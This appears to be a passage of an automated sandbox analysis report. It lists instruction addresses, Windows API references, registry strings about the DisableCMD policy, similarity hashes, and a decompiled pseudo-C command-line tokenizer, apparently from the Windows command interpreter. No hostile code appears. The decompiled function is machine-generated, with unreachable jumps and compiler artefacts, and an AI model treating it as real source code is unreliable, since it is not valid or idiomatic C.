                                  0x0016e7a9
                                  0x0016e7d0
                                  0x0016e7d5
                                  0x0016e7d7
                                  0x0016e7db
                                  0x0016e7e2
                                  0x0016e7e9
                                  0x0016e7e9
                                  0x0016e7eb
                                  0x0016e7f0
                                  0x0016e7f0
                                  0x0016e7f6
                                  0x0016e7fc
                                  0x0016e808
                                  0x0016e80e
                                  0x0016e815
                                  0x0016e817
                                  0x0016e81e
                                  0x0016e820
                                  0x0016e823
                                  0x00000000
                                  0x00000000
                                  0x0016e825
                                  0x0016e825
                                  0x0016e828
                                  0x0016e899
                                  0x0016e89f
                                  0x0016e89f
                                  0x0016e762
                                  0x0016e762
                                  0x00164625
                                  0x00164625
                                  0x0016462b
                                  0x00164634
                                  0x0016463c
                                  0x0016e768
                                  0x0016e76e
                                  0x0016e76e
                                  0x0016e772
                                  0x00000000
                                  0x0016e772
                                  0x00164645
                                  0x0016e758
                                  0x0016e75e
                                  0x0016e75e
                                  0x00000000
                                  0x0016e758
                                  0x0016464b
                                  0x0016464f
                                  0x00164656
                                  0x00164658
                                  0x00164658
                                  0x001645e3
                                  0x001645e3
                                  0x001645e7
                                  0x001645db
                                  0x001645db
                                  0x001645e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x001645e1
                                  0x001645e9
                                  0x001645ee
                                  0x001645fa
                                  0x001645ff
                                  0x00164605
                                  0x0016460a
                                  0x00164610
                                  0x00164610
                                  0x00164612
                                  0x0016e779
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00164618
                                  0x00164618
                                  0x0016461e
                                  0x00164622
                                  0x00000000
                                  0x00164622
                                  0x0016e830
                                  0x0016e83c
                                  0x0016e842
                                  0x0016e848
                                  0x0016e854
                                  0x0016e859
                                  0x0016e85f
                                  0x0016e868
                                  0x0016e86d
                                  0x0016e873
                                  0x0016e878
                                  0x0016e884
                                  0x0016e889
                                  0x0016e88f
                                  0x0016e7f0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e7f0
                                  0x0016e7f6
                                  0x0016e7fc
                                  0x0016e808
                                  0x0016e80e
                                  0x0016e815
                                  0x0016e817
                                  0x0016e81e
                                  0x0016e820
                                  0x0016e820
                                  0x0016e7f0
                                  0x0016e7ab
                                  0x0016e7ac
                                  0x0016e7b1
                                  0x0016e7b9
                                  0x0016e7be
                                  0x0016e7c4
                                  0x0016e7c4
                                  0x0016e7c8
                                  0x00000000
                                  0x0016e7c8
                                  0x0016e796
                                  0x0016e798
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e79a
                                  0x0016e79a
                                  0x0016e7a0
                                  0x0016e7a0
                                  0x00000000
                                  0x0016e7a4
                                  0x001645b7
                                  0x001645b8
                                  0x001645bd
                                  0x001645c4
                                  0x001645cc
                                  0x0016e744
                                  0x0016e745
                                  0x0016e748
                                  0x0016e74a
                                  0x0016e750
                                  0x0016e750
                                  0x001645d2
                                  0x001645d2
                                  0x001645d2
                                  0x001645d7
                                  0x00000000
                                  0x001645d9
                                  0x001645d9
                                  0x00000000
                                  0x001645d9
                                  0x001645d7

                                  APIs
                                  • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00164516
                                  • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00164523
                                    • Part of subcall function 0016465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,00164533), ref: 00164687
                                    • Part of subcall function 0016465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,00164533), ref: 001646A7
                                  • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00164538
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00164555
                                  • _setjmp3.MSVCRT ref: 001645BD
                                  • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 001645EE
                                  • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00183840), ref: 001645FF
                                  • exit.MSVCRT ref: 00164625
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 0016E707
                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 0016E710
                                    • Part of subcall function 00164719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,0016D822,?,00000000,00000000), ref: 00164770
                                    • Part of subcall function 00164719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,0016D822,?,00000000,00000000), ref: 0016478C
                                    • Part of subcall function 001646D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(0016458C), ref: 001646D8
                                    • Part of subcall function 001646D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00183840), ref: 001646E9
                                    • Part of subcall function 001646D8: memset.MSVCRT ref: 00164703
                                    • Part of subcall function 00163D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0018385C), ref: 00163D4B
                                    • Part of subcall function 00163D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00163D57
                                    • Part of subcall function 00163D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00163D6B
                                    • Part of subcall function 00163D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00176D90,00000001), ref: 00163D78
                                    • Part of subcall function 00163D27: _get_osfhandle.MSVCRT ref: 00163D85
                                    • Part of subcall function 00163D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00163D8D
                                    • Part of subcall function 00163D27: _get_osfhandle.MSVCRT ref: 00163D99
                                    • Part of subcall function 00163D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00163DA1
                                    • Part of subcall function 00163D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00163DC7
                                    • Part of subcall function 00163D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00163E02
                                  • _setjmp3.MSVCRT ref: 0016E785
                                  Strings
                                  • DisableCMD, xrefs: 0016E6FF
                                  • Software\Policies\Microsoft\Windows\System, xrefs: 0016454B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
                                  • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                  • API String ID: 4268540630-1920437939
                                  • Opcode ID: e84da97d1039e16db25f034ae4260d094da494d9fbb0f5d3766e537e87088782
                                  • Instruction ID: edb3a96e29f4b111a2f25919d99c2025bfbdddc38516297cdcb36a106ccb9bc4
                                  • Opcode Fuzzy Hash: e84da97d1039e16db25f034ae4260d094da494d9fbb0f5d3766e537e87088782
                                  • Instruction Fuzzy Hash: D671E475A00208AFEB24AF74EC86A6F37FCEF15305B14452AF516E65A1DF30C9A08B60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015F300, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 441COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0015F300(signed int __eax, signed short* __ecx, intOrPtr __edx, signed int _a4) {
				signed short* _v8;
				intOrPtr _v12;
				signed short* _v16;
				long _v20;
				signed int _t92;
				signed int _t102;
				signed int _t109;
				signed char _t110;
				int _t111;
				wchar_t* _t112;
				wchar_t* _t113;
				int _t114;
				signed int _t120;
				long _t121;
				int _t122;
				wchar_t* _t123;
				signed int _t129;
				int _t130;
				signed int _t135;
				int _t136;
				signed int _t139;
				signed short* _t141;
				int _t148;
				long _t152;
				int _t153;
				int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				int _t164;
				wchar_t* _t165;
				wchar_t* _t166;
				signed short* _t167;
				signed int _t169;
				signed int _t173;
				long* _t174;
				long* _t180;
				long* _t181;
				intOrPtr _t182;
				long* _t183;
				long _t184;
				long _t185;
				long _t186;
				long _t187;
				void* _t188;
				void* _t189;
				void* _t192;

				_t175 = __ecx;
				_t92 = __eax;
				_push(0);
				_push(0x18b8f8);
				_v12 = __edx;
				_v8 = __ecx;
				L001682C1();
				_t189 = _t188 + 8;
				if(__eax != 0) {
					L139:
					return _t92 | 0xffffffff;
				}
				_t180 = _v8;
				if(_t180 == 0) {
					if( *0x18f984 != 0) {
						_push( *0x18b8a0);
						E001625D9(L"Ungetting: \'%s\'\n");
					}
					 *0x18b8a4 =  *0x18b8a0;
					return 0;
				} else {
					if(_v12 < 6) {
						goto L139;
					}
					_t169 = _a4;
					 *0x18b8a0 =  *0x18b8a4;
					_v16 = _t180;
					if((_t169 & 0x00000021) == 0) {
						while(1) {
							_t187 = E0015F9D5(_t175) & 0x0000ffff;
							_t164 = iswspace(_t187);
							_t189 = _t189 + 4;
							if(_t164 != 0 && _t187 != 0xa) {
								goto L6;
							} else {
								continue;
							}
							do {
								_t187 = E0015F9D5(_t175) & 0x0000ffff;
								_t164 = iswspace(_t187);
								_t189 = _t189 + 4;
							} while (_t164 != 0 && _t187 != 0xa);
							L6:
							if((_t169 & 0x00000004) != 0) {
								_t165 = 0x152102;
							} else {
								_t165 = L"=,;";
							}
							_t166 = wcschr(_t165, _t187);
							_t189 = _t189 + 8;
							if(_t166 != 0) {
								if(_t187 == 0) {
									goto L9;
								} else {
									continue;
								}
							}
							L9:
							_t167 =  *0x18b8a4;
							if(_t167 != 0x183890) {
								 *0x18b8a4 = _t167 - 2;
							}
							goto L11;
						}
					}
					L11:
					_t184 = E0015F9D5(_t175) & 0x0000ffff;
					if( *0x17d5b4 != 0) {
						 *0x17d5b4 = 0;
						if((_t169 & 0x00000040) != 0) {
							goto L41;
						} else {
							_t184 = E0015F9D5(_t175) & 0x0000ffff;
							goto L12;
						}
						goto L140;
					} else {
						L12:
						_t129 = _t184 & 0x0000ffff;
						if(_t129 != 0xa) {
							if(_t129 >= 0x41) {
								if(_t129 >= 0x7c) {
									goto L25;
								} else {
									goto L33;
								}
							} else {
								L25:
								if(_t129 > 0x7c) {
									goto L33;
								} else {
									_t16 = _t129 + 0x15f8c0; // 0x5050500
									switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M0015F8A8))) {
										case 0:
											goto L13;
										case 1:
											goto L14;
										case 2:
											L27:
											if((_t169 & 0x0000002a) == 8) {
												goto L28;
											}
											goto L33;
										case 3:
											L28:
											if((_t169 & 0x00000022) == 0) {
												if((_t169 & 0x00000010) != 0 || _t184 != 0x29) {
													goto L13;
												} else {
												}
											}
											goto L33;
										case 4:
											if((__bl & 0x00000022) != 0) {
												goto L33;
											} else {
												if( *0x17d548 != 0) {
													goto L27;
												} else {
													goto L41;
												}
											}
											goto L140;
										case 5:
											goto L33;
									}
								}
							}
						} else {
							L13:
							_t169 = _t169 & 0xffffffdd;
							_a4 = _t169;
							L14:
							if((_t169 & 0x00000022) == 0) {
								L15:
								 *_t180 = _t184;
								_t183 =  &(_t180[0]);
								_v8 = _t183;
								_t174 = _t183;
								_t136 = iswdigit(_t184);
								_t192 = _t189 + 4;
								if(_t136 != 0) {
									_t184 = E0015F9D5(_t175) & 0x0000ffff;
									_t174 =  &(_t183[0]);
									 *_t183 = _t184;
									_t183 = _t174;
									_v8 = _t183;
								}
								if(_t184 == 0x3e || _t184 == 0x26 || _t184 == 0x7c || _t184 == 0x3c) {
									_t139 = E0015F9D5(_t175) & 0x0000ffff;
									if(_t139 ==  *(_t183 - 2)) {
										 *_t183 = _t139;
										_t183 =  &(_t174[0]);
										_v8 = _t183;
										_t139 = E0015F9D5(_t175) & 0x0000ffff;
										_t174 = _t183;
									}
									_t176 =  *(_t183 - 2) & 0x0000ffff;
									if(_t176 != 0x3e) {
										if(_t176 != 0x3c) {
											goto L79;
										}
										goto L78;
									} else {
										L78:
										if(_t139 == 0x26) {
											 *_t183 = 0x26;
											_t183 =  &(_t174[0]);
											_v8 = _t183;
											goto L109;
											do {
												do {
													L109:
													_t186 = E0015F9D5(_t176) & 0x0000ffff;
													_t148 = iswspace(_t186);
													_t192 = _t192 + 4;
												} while (_t148 != 0);
												_t176 = L"=,;";
											} while (E0015D7D4(L"=,;", _t186) != 0);
											if(iswdigit(_t186) != 0) {
												 *_t183 = _t186;
												_t183 =  &(_t183[0]);
												_v8 = _t183;
												E0015F9D5(_t176);
											}
										}
										L79:
										_t141 =  *0x18b8a4;
										if(_t141 != 0x183890) {
											 *0x18b8a4 = _t141 - 2;
										}
										goto L20;
									}
								} else {
									L20:
									 *_t183 = 0;
									return  *_v16 & 0x0000ffff;
								}
							}
							L33:
							if(_t184 == 0x5e) {
								if((_t169 & 0x00000022) != 0) {
									goto L34;
								} else {
									_t184 = E0015F9D5(_t175) & 0x0000ffff;
									if(_t184 == 0) {
										goto L15;
									}
									if(_t184 != 0xa) {
										goto L41;
									} else {
										_t184 = E0015F9D5(_t175) & 0x0000ffff;
										if(_t184 != 0) {
											goto L41;
										} else {
											goto L15;
										}
									}
								}
								goto L140;
							} else {
								L34:
								if(_t184 == 0x22) {
									_t169 = _t169 ^ 0x00000002;
									_a4 = _t169;
								}
								if((_t169 & 0x00000023) == 0) {
									_t155 = iswspace(_t184);
									_t189 = _t189 + 4;
									if(_t155 != 0) {
										goto L15;
									}
									if((_t169 & 0x00000004) != 0) {
										_t156 = 0x152102;
									} else {
										_t156 = L"=,;";
									}
									_t157 = wcschr(_t156, _t184);
									_t189 = _t189 + 8;
									if(_t157 != 0) {
										goto L15;
									}
								}
								_t130 = iswdigit(_t184);
								_t189 = _t189 + 4;
								if(_t130 != 0) {
									_t175 =  *0x18b8a4;
									if((_t175 - 0x18388e & 0xfffffffe) < 4) {
										L88:
										_t135 =  *_t175 & 0x0000ffff;
										if(_t135 != 0x3e) {
											if(_t135 != 0x3c) {
												goto L41;
											} else {
												goto L89;
											}
										} else {
											L89:
											if((_t169 & 0x00000022) == 0) {
												goto L15;
											}
											goto L41;
										}
									} else {
										_t152 =  *(_t175 - 4) & 0x0000ffff;
										_v20 = _t152;
										_t153 = iswspace(_t152);
										_t189 = _t189 + 4;
										if(_t153 == 0) {
											_t175 = L"()|&=,;\"";
											if(E0015D7D4(L"()|&=,;\"", _v20) == 0) {
												goto L41;
											} else {
												goto L87;
											}
										} else {
											L87:
											_t175 =  *0x18b8a4;
											goto L88;
										}
									}
									goto L140;
								}
							}
						}
					}
					L41:
					 *_t180 = _t184;
					_t181 =  &(_t180[0]);
					_a4 = _t169 | 0x00000040;
					 *0x17d548 = 0;
					_t173 = _t181 - _v16 >> 1;
					while(1) {
						_v8 = _t181;
						_t185 = E0015F9D5(_t175) & 0x0000ffff;
						if( *0x17d5b4 != 0) {
							goto L131;
						}
						L43:
						_t109 = _t185 & 0x0000ffff;
						if(_t109 < 0x41 || _t109 >= 0x7c) {
							if(_t109 > 0x7c) {
								goto L45;
							} else {
								_t34 = _t109 + 0x15f958; // 0x5050500
								switch( *((intOrPtr*)(( *_t34 & 0x000000ff) * 4 +  &M0015F940))) {
									case 0:
										_t127 = _a4;
										goto L54;
									case 1:
										__eax = _a4;
										goto L55;
									case 2:
										__eax = _a4;
										goto L114;
									case 3:
										L101:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if((__al & 0x00000010) != 0) {
												L54:
												_t102 = _t127 & 0xffffffdd;
												_a4 = _t102;
												L55:
												if((_t102 & 0x00000022) != 0) {
													goto L45;
												}
												goto L62;
											} else {
												if(__si == 0x29) {
													goto L45;
												} else {
													goto L54;
												}
											}
										}
										goto L140;
									case 4:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if( *0x17d548 == 0) {
												goto L49;
											} else {
												L114:
												__al = __al & 0x0000002a;
												if(__al != 8) {
													goto L45;
												} else {
													goto L101;
												}
											}
										}
										goto L140;
									case 5:
										goto L45;
								}
							}
						} else {
							L45:
							_t110 = _a4;
							if(_t185 == 0x5e) {
								if((_t110 & 0x00000022) != 0) {
									goto L46;
								} else {
									_t185 = E0015F9D5(_t175) & 0x0000ffff;
									if(_t185 == 0) {
										goto L61;
									} else {
										if(_t185 != 0xa) {
											goto L49;
										} else {
											_t185 = E0015F9D5(_t175) & 0x0000ffff;
											if(_t185 == 0) {
												goto L61;
											} else {
												goto L49;
											}
										}
									}
								}
								goto L140;
							} else {
								L46:
								if(_t185 == 0x22) {
									_t110 = _t110 ^ 0x00000002;
									_a4 = _t110;
								}
								if((_t110 & 0x00000023) == 0) {
									_t111 = iswspace(_t185);
									_t189 = _t189 + 4;
									if(_t111 != 0) {
										goto L61;
									} else {
										if((_a4 & 0x00000004) != 0) {
											_t112 = 0x152102;
										} else {
											_t112 = L"=,;";
										}
										_t113 = wcschr(_t112, _t185);
										_t189 = _t189 + 8;
										if(_t113 == 0) {
											goto L48;
										} else {
											goto L61;
										}
									}
								} else {
									L48:
									_t114 = iswdigit(_t185);
									_t189 = _t189 + 4;
									if(_t114 != 0) {
										_t175 =  *0x18b8a4;
										if((_t175 - 0x18388e & 0xfffffffe) < 4) {
											L70:
											_t120 =  *( *0x18b8a4) & 0x0000ffff;
											if(_t120 == 0x3e || _t120 == 0x3c) {
												_t102 = _a4;
												if((_t102 & 0x00000022) == 0) {
													goto L62;
												} else {
													goto L49;
												}
											} else {
												goto L49;
											}
										} else {
											_t121 =  *(_t175 - 4) & 0x0000ffff;
											_v20 = _t121;
											_t122 = iswspace(_t121);
											_t189 = _t189 + 4;
											if(_t122 != 0) {
												goto L70;
											} else {
												_t123 = wcschr(L"()|&=,;\"", _v20);
												_t189 = _t189 + 8;
												if(_t123 == 0) {
													goto L49;
												} else {
													goto L70;
												}
											}
										}
										goto L140;
									} else {
										L49:
										if(_t173 >= _v12 - 1) {
											L61:
											_t102 = _a4;
										} else {
											 *_t181 = _t185;
											_t181 =  &(_t181[0]);
											_t173 = _t173 + 1;
											continue;
										}
									}
								}
							}
						}
						L62:
						_a4 = _t102 & 0xffffffbf;
						 *_t181 = 0;
						_t182 = _v12;
						_t47 = _t182 - 1; // 0x3
						if(_t173 < _t47) {
							_t175 =  *0x18b8a4;
							if( *0x18b8a4 != 0x183890) {
								 *0x18b8a4 =  *0x18b8a4 - 2;
							}
						}
						if(_t173 >= _t182) {
							if(_t185 != 0xffff) {
								_t92 = E0015C5A2(_t175, 0x234f, 1, _v16);
								goto L139;
							}
						}
						return 0x4000;
						goto L140;
						L131:
						 *0x17d5b4 = 0;
						if((_a4 & 0x00000040) != 0) {
							goto L49;
						} else {
							_t185 = E0015F9D5(_t175) & 0x0000ffff;
							goto L43;
						}
						goto L140;
					}
				}
				goto L140;
			}

















































                                  0x0015f300
                                  0x0015f300
                                  0x0015f30b
                                  0x0015f30d
                                  0x0015f312
                                  0x0015f315
                                  0x0015f318
                                  0x0015f31d
                                  0x0015f322
                                  0x0016c593
                                  0x00000000
                                  0x0016c593
                                  0x0015f328
                                  0x0015f32d
                                  0x0015f432
                                  0x0016c4dc
                                  0x0016c4e7
                                  0x0016c4ec
                                  0x0015f43d
                                  0x0015f44a
                                  0x0015f333
                                  0x0015f337
                                  0x00000000
                                  0x00000000
                                  0x0015f33d
                                  0x0015f345
                                  0x0015f34a
                                  0x0015f350
                                  0x0015f352
                                  0x0015f357
                                  0x0015f35b
                                  0x0015f361
                                  0x0015f366
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f352
                                  0x0015f357
                                  0x0015f35b
                                  0x0015f361
                                  0x0015f364
                                  0x0015f36d
                                  0x0015f370
                                  0x0015f744
                                  0x0015f376
                                  0x0015f376
                                  0x0015f376
                                  0x0015f37d
                                  0x0015f383
                                  0x0015f388
                                  0x0015f6de
                                  0x00000000
                                  0x0015f6e4
                                  0x00000000
                                  0x0015f6e4
                                  0x0015f6de
                                  0x0015f38e
                                  0x0015f38e
                                  0x0015f398
                                  0x0015f39d
                                  0x0015f39d
                                  0x00000000
                                  0x0015f398
                                  0x0015f352
                                  0x0015f3a2
                                  0x0015f3ae
                                  0x0015f3b1
                                  0x0016c4f4
                                  0x0016c501
                                  0x00000000
                                  0x0016c507
                                  0x0016c50c
                                  0x00000000
                                  0x0016c50c
                                  0x00000000
                                  0x0015f3b7
                                  0x0015f3b7
                                  0x0015f3b7
                                  0x0015f3bd
                                  0x0015f450
                                  0x0015f48a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f452
                                  0x0015f452
                                  0x0015f455
                                  0x00000000
                                  0x0015f457
                                  0x0015f457
                                  0x0015f45e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f465
                                  0x0015f46b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f46d
                                  0x0015f470
                                  0x0015f475
                                  0x00000000
                                  0x00000000
                                  0x0015f485
                                  0x0015f475
                                  0x00000000
                                  0x00000000
                                  0x0015f7bb
                                  0x00000000
                                  0x0015f7c1
                                  0x0015f7c8
                                  0x00000000
                                  0x0015f7ce
                                  0x00000000
                                  0x0015f7ce
                                  0x0015f7c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f45e
                                  0x0015f455
                                  0x0015f3c3
                                  0x0015f3c3
                                  0x0015f3c3
                                  0x0015f3c6
                                  0x0015f3c9
                                  0x0015f3cc
                                  0x0015f3d2
                                  0x0015f3d2
                                  0x0015f3d5
                                  0x0015f3d9
                                  0x0015f3dc
                                  0x0015f3de
                                  0x0015f3e4
                                  0x0015f3e9
                                  0x0015f76d
                                  0x0015f770
                                  0x0015f773
                                  0x0015f776
                                  0x0015f778
                                  0x0015f778
                                  0x0015f3f3
                                  0x0015f681
                                  0x0015f688
                                  0x0015f6c6
                                  0x0015f6c9
                                  0x0015f6cc
                                  0x0015f6d4
                                  0x0015f6d7
                                  0x0015f6d7
                                  0x0015f68a
                                  0x0015f691
                                  0x0015f739
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f697
                                  0x0015f697
                                  0x0015f69b
                                  0x0015f7d8
                                  0x0015f7db
                                  0x0015f7de
                                  0x0015f7de
                                  0x0015f7e1
                                  0x0015f7e1
                                  0x0015f7e1
                                  0x0015f7e6
                                  0x0015f7ea
                                  0x0015f7f0
                                  0x0015f7f3
                                  0x0015f7f9
                                  0x0015f803
                                  0x0015f813
                                  0x0015f819
                                  0x0015f81c
                                  0x0015f81f
                                  0x0015f822
                                  0x0015f822
                                  0x0015f813
                                  0x0015f6a1
                                  0x0015f6a1
                                  0x0015f6ab
                                  0x0015f6b4
                                  0x0015f6b4
                                  0x00000000
                                  0x0015f6ab
                                  0x0015f417
                                  0x0015f417
                                  0x0015f419
                                  0x00000000
                                  0x0015f41f
                                  0x0015f3f3
                                  0x0015f48c
                                  0x0015f490
                                  0x0015f868
                                  0x00000000
                                  0x0015f86e
                                  0x0015f873
                                  0x0015f879
                                  0x00000000
                                  0x00000000
                                  0x0015f882
                                  0x00000000
                                  0x0015f888
                                  0x0016c519
                                  0x0016c51f
                                  0x00000000
                                  0x0016c525
                                  0x00000000
                                  0x0016c525
                                  0x0016c51f
                                  0x0015f882
                                  0x00000000
                                  0x0015f496
                                  0x0015f496
                                  0x0015f49a
                                  0x0015f780
                                  0x0015f783
                                  0x0015f783
                                  0x0015f4a3
                                  0x0015f4a6
                                  0x0015f4ac
                                  0x0015f4b1
                                  0x00000000
                                  0x00000000
                                  0x0015f4ba
                                  0x0015f74e
                                  0x0015f4c0
                                  0x0015f4c0
                                  0x0015f4c0
                                  0x0015f4c7
                                  0x0015f4cd
                                  0x0015f4d2
                                  0x00000000
                                  0x00000000
                                  0x0015f4d2
                                  0x0015f4d9
                                  0x0015f4df
                                  0x0015f4e4
                                  0x0015f6e9
                                  0x0015f6ff
                                  0x0015f720
                                  0x0015f720
                                  0x0015f726
                                  0x0015f78e
                                  0x00000000
                                  0x0015f794
                                  0x00000000
                                  0x0015f794
                                  0x0015f728
                                  0x0015f728
                                  0x0015f72b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f731
                                  0x0015f701
                                  0x0015f701
                                  0x0015f706
                                  0x0015f709
                                  0x0015f70f
                                  0x0015f714
                                  0x0015f890
                                  0x0015f89c
                                  0x00000000
                                  0x0015f8a2
                                  0x00000000
                                  0x0015f8a2
                                  0x0015f71a
                                  0x0015f71a
                                  0x0015f71a
                                  0x00000000
                                  0x0015f71a
                                  0x0015f714
                                  0x00000000
                                  0x0015f6ff
                                  0x0015f4e4
                                  0x0015f490
                                  0x0015f3bd
                                  0x0015f4ea
                                  0x0015f4ed
                                  0x0015f4f0
                                  0x0015f4f3
                                  0x0015f4f8
                                  0x0015f505
                                  0x0015f507
                                  0x0015f507
                                  0x0015f516
                                  0x0015f519
                                  0x00000000
                                  0x00000000
                                  0x0015f51f
                                  0x0015f51f
                                  0x0015f525
                                  0x0015f56d
                                  0x00000000
                                  0x0015f56f
                                  0x0015f56f
                                  0x0015f576
                                  0x00000000
                                  0x0015f57d
                                  0x00000000
                                  0x00000000
                                  0x0015f6be
                                  0x00000000
                                  0x00000000
                                  0x0015f82c
                                  0x00000000
                                  0x00000000
                                  0x0015f796
                                  0x0015f796
                                  0x0015f79b
                                  0x00000000
                                  0x0015f7a1
                                  0x0015f7a3
                                  0x0015f580
                                  0x0015f580
                                  0x0015f583
                                  0x0015f586
                                  0x0015f588
                                  0x00000000
                                  0x0015f58a
                                  0x00000000
                                  0x0015f7a9
                                  0x0015f7ad
                                  0x00000000
                                  0x0015f7b3
                                  0x00000000
                                  0x0015f7b3
                                  0x0015f7ad
                                  0x0015f7a3
                                  0x00000000
                                  0x00000000
                                  0x0015f758
                                  0x0015f75d
                                  0x00000000
                                  0x0015f763
                                  0x0016c552
                                  0x00000000
                                  0x0016c558
                                  0x0015f82f
                                  0x0015f82f
                                  0x0015f833
                                  0x00000000
                                  0x0015f839
                                  0x00000000
                                  0x0015f839
                                  0x0015f833
                                  0x0016c552
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f576
                                  0x0015f52c
                                  0x0015f52c
                                  0x0015f52c
                                  0x0015f533
                                  0x0015f840
                                  0x00000000
                                  0x0015f846
                                  0x0015f84b
                                  0x0015f851
                                  0x00000000
                                  0x0015f857
                                  0x0015f85a
                                  0x00000000
                                  0x0015f860
                                  0x0016c562
                                  0x0016c568
                                  0x00000000
                                  0x0016c56e
                                  0x00000000
                                  0x0016c56e
                                  0x0016c568
                                  0x0015f85a
                                  0x0015f851
                                  0x00000000
                                  0x0015f539
                                  0x0015f539
                                  0x0015f53d
                                  0x0015f671
                                  0x0015f674
                                  0x0015f674
                                  0x0015f545
                                  0x0015f58d
                                  0x0015f593
                                  0x0015f598
                                  0x00000000
                                  0x0015f59a
                                  0x0015f59e
                                  0x0015f667
                                  0x0015f5a4
                                  0x0015f5a4
                                  0x0015f5a4
                                  0x0015f5ab
                                  0x0015f5b1
                                  0x0015f5b6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f5b6
                                  0x0015f547
                                  0x0015f547
                                  0x0015f548
                                  0x0015f54e
                                  0x0015f553
                                  0x0015f5fb
                                  0x0015f611
                                  0x0015f641
                                  0x0015f646
                                  0x0015f64c
                                  0x0015f657
                                  0x0015f65c
                                  0x00000000
                                  0x0015f662
                                  0x00000000
                                  0x0015f662
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f613
                                  0x0015f613
                                  0x0015f618
                                  0x0015f61b
                                  0x0015f621
                                  0x0015f626
                                  0x00000000
                                  0x0015f628
                                  0x0015f630
                                  0x0015f636
                                  0x0015f63b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015f63b
                                  0x0015f626
                                  0x00000000
                                  0x0015f559
                                  0x0015f559
                                  0x0015f55f
                                  0x0015f5b8
                                  0x0015f5b8
                                  0x0015f561
                                  0x0015f561
                                  0x0015f564
                                  0x0015f567
                                  0x00000000
                                  0x0015f567
                                  0x0015f55f
                                  0x0015f553
                                  0x0015f545
                                  0x0015f533
                                  0x0015f5bb
                                  0x0015f5be
                                  0x0015f5c3
                                  0x0015f5c6
                                  0x0015f5c9
                                  0x0015f5ce
                                  0x0015f5d0
                                  0x0015f5dc
                                  0x0015f5de
                                  0x0015f5de
                                  0x0015f5dc
                                  0x0015f5e7
                                  0x0016c57b
                                  0x0016c58b
                                  0x00000000
                                  0x0016c590
                                  0x0016c57b
                                  0x0015f5f8
                                  0x00000000
                                  0x0016c52a
                                  0x0016c52e
                                  0x0016c538
                                  0x00000000
                                  0x0016c53e
                                  0x0016c543
                                  0x00000000
                                  0x0016c543
                                  0x00000000
                                  0x0016c538
                                  0x0015f507
                                  0x00000000

                                  APIs
                                  Strings
